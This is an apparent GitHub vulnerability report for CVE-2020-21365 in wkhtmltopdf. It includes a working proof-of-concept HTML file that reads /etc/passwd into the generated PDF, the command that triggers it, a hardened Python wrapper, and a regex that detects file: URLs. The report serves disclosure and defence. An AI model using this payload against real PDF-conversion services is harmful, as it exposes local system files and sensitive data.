CVE-2020-21365: The same origin policy allows local files to be read by default · Issue #4536 · wkhtmltopdf/wkhtmltopdf
Directory traversal vulnerability in wkhtmltopdf through 0.12.5 allows remote attackers to read local files and disclose sensitive information via a crafted html file running with the default configurations.
wkhtmltopdf version(s) affected:
all versions (<= 0.12.5)
OS information
All supported OS
Description
Because the same-origin policy is not strict enough, HTML files under the file domain can read any file.
How to reproduce
Create an HTML file named 111.html
The file contents are as follows.
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head>
<body>
<script>
// Request a local file from a page that itself lives under file://
x=new XMLHttpRequest;
x.onload=function(){
  // The response is written into the page, so it ends up in the rendered PDF
  document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>
</body></html>
Convert HTML to PDF:
wkhtmltopdf /tmp/111.html /tmp/result.pdf
Expected behavior
View the contents of result.pdf and you will see the contents of the file /etc/passwd!
Possible Solution
Make the same-origin policy strict, or add a security option, to prevent HTML documents under the file domain from reading any files.
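A hardened wrapper in the spirit of that solution, added here as an example and not code from the issue or from the wkhtmltopdf project: it always passes wkhtmltopdf's --disable-local-file-access and --disable-javascript options (assumed to be available on the installed build; only 0.12.6 and later make the first of them the default) and scans the input for file: URLs so that such documents can be logged and alerted on. The sample document is a constructed copy of the proof of concept above.

```python
import re
import subprocess
from pathlib import Path

# Constructed sample input: a copy of the issue's proof-of-concept document.
POC_HTML = """<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head>
<body><script>
x=new XMLHttpRequest;
x.onload=function(){document.write(this.responseText)};
x.open("GET","file:///etc/passwd");
x.send();
</script></body></html>"""

# Matches file: URLs wherever they appear: script strings, src/href attributes, CSS url().
FILE_URL_RE = re.compile(r"""\bfile:/{0,3}[^\s"'<>)]+""", re.IGNORECASE)


def find_local_file_refs(html: str) -> list[str]:
    """Return every file: URL found in an HTML document, for logging and alerting.

    This is only a tripwire: a script can assemble the URL at run time, so the
    command-line options below are what actually block the read.
    """
    return FILE_URL_RE.findall(html)


def hardened_command(input_html: Path, output_pdf: Path) -> list[str]:
    """Build a wkhtmltopdf argv that can neither read local files nor run scripts."""
    return [
        "wkhtmltopdf",
        "--disable-local-file-access",  # refuse file:// reads from the converted document
        "--disable-javascript",         # the PoC relies on XMLHttpRequest to fetch the file
        str(input_html),
        str(output_pdf),
    ]


def convert_untrusted(input_html: Path, output_pdf: Path, timeout_s: int = 60) -> list[str]:
    """Convert an untrusted document with the hardened options.

    Returns the file: references seen in the input so the caller can alert on them;
    the conversion itself is still performed with local file access disabled.
    """
    refs = find_local_file_refs(input_html.read_text(errors="replace"))
    if refs:
        print(f"warning: {input_html} references local files: {refs}")
    subprocess.run(hardened_command(input_html, output_pdf), check=True, timeout=timeout_s)
    return refs
```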
Related news
Ubuntu Security Notice 6232-1 - It was discovered that wkhtmltopdf was not properly enforcing the same-origin policy when processing certain HTML files. If a user or automated system using wkhtmltopdf were tricked into processing a specially crafted HTML file, an attacker could possibly use this issue to expose sensitive information.